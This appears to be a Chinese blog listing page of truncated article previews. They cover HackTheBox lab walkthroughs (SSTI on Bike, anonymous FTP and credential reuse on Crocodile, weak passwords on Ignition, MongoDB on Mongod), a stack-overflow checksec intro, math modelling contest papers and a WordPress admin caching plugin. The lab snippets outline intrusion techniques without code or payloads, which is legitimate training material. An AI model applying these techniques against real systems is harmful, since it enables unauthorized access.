第一步   checksec一下,该题是64位的,该题目大概率是一道栈溢出(因为题目里面提到了stack) 分析一下这个二进制保护机制: Arch: amd64-64-little 这表示二进制文件是为64位AMD处理器设计的,使用的是小端序(little-endian)格式。RELRO: Partial RELRO RELRO(Relocation Read-Only)是一种安全特性,旨

高教社杯数模竞赛特辑论文篇-2016年C题:电池剩余放电时间预测(附MATLAB代码实现)

目录 摘要 一、 问题重述 1.1 已知铅酸电池的基本情况与要求 1.2 需要解决的问题 1.2.1 问题 1 需要解决以下三点: 1.2.2 需要解决以下三点: 1.2.3 问题3需要解决: 二、问题分析 2.1 问题1 2.2 问题 2 2.3 问题3 三、模型假设与约定 四、符号说明及名词定义 五、模型的建立与求解 5.1 问题一的分析与求解 5.2 问题二的分析与求解 5.3 问题三的分

HTB-bike(SSTI模版注入)

前言 大家好,我是qmx_07,今天给大家讲解bike靶场 渗透过程 信息搜集 服务器开放了 22 ssh 和 http80端口 Wappalyzer 介绍:Wappalyzer是一种浏览器扩展程序,用于识别正在访问的网站所使用的技术栈和工具,比如使用的web框架,编程语言等 服务器所使用Express框架 发现SSTI模版注入 可以看到这个输入框,用来输出 内容尝试x

高教社杯数模竞赛特辑论文篇-2016年A题:系泊系统设计(续)(附MATLAB代码实现)

目录 7.2 模型建立 7.2.1 系泊系统的水流力分析 7.2.2 系统构件受力分析 7.3 模型求解 7.3.1 变步长搜索算法 7.3.2 结果分析 八、模型评价及推广 8.1 模型的评价 8..2 模型的改进 8.4 模型的推广 九、参考文献 代码实现 附录 1:问题一的解答程序 附录 2 问题一沉底修补程序  附录三:问题二优化程序 附录四:熵值法 附录五:二维模型制图  附录六 三

HTB-lgnition(curl工具、yakit、 弱口令)

前言 各位师傅大家好,我是qmx_07,今天来讲解lgnition靶机 渗透流程 信息搜集 服务器开放了80 http端口 curl工具 介绍:curl工具是一个用于发送HTTP请求的命令行工具。它支持多种协议,包括HTTP、HTTPS、FTP、SMTP等,并且支持各种常见的操作,如GET、POST、PUT、DELETE等。 -v显示输出与请求和响应相关的详细信息,包括请求头

WordPress 后台缓存插件:WP Admin Cache提高缓存页面

使用WordPress建站会安装一些静态缓存插件,比如:WP Rocket、Cache Enabler、Comet Cache、W3 Total Cache、WP Super Cache、WP Fastest Cache、Hyper Cache等等,这些都用于缓存前端。 今天介绍一款专门用于缓存后台的插件:WP Admin Cache。 启用后,提速效果还是很明显,比如后台所有文章页面秒开

HTB-Crocodile(FTP和web综合利用)

前言 各位师傅大家好,今天给大家讲解Crocodile靶机 渗透过程 信息搜集 服务器开放了21FTP和80HTTP服务思路:可以尝试 匿名登录FTP 或者 尝试WEB登录后台 FTP匿名登录 通过anonymous 匿名登录到FTP服务器allowed.userlist 和 allowed.usserlist.pass 分别是 账户和密码 Web目录爆破 服务器有

HTB-Mongod(MongoDb数据库)

前言 各位师傅大家好,我是qmx_07,今天给大家讲解Mongod靶场 Mongod 渗透过程 RustScan 介绍:Rustscan是一款用Rust语言开发的高速端口扫描器,它可以在3秒内扫描所有65535个端口,并支持脚本引擎和自适应学习功能,并且可以和nmap进行联动可以简单理解成 多线程的nmap扫描器 RustScan安装: 1.创建文件夹mkdir Rustsca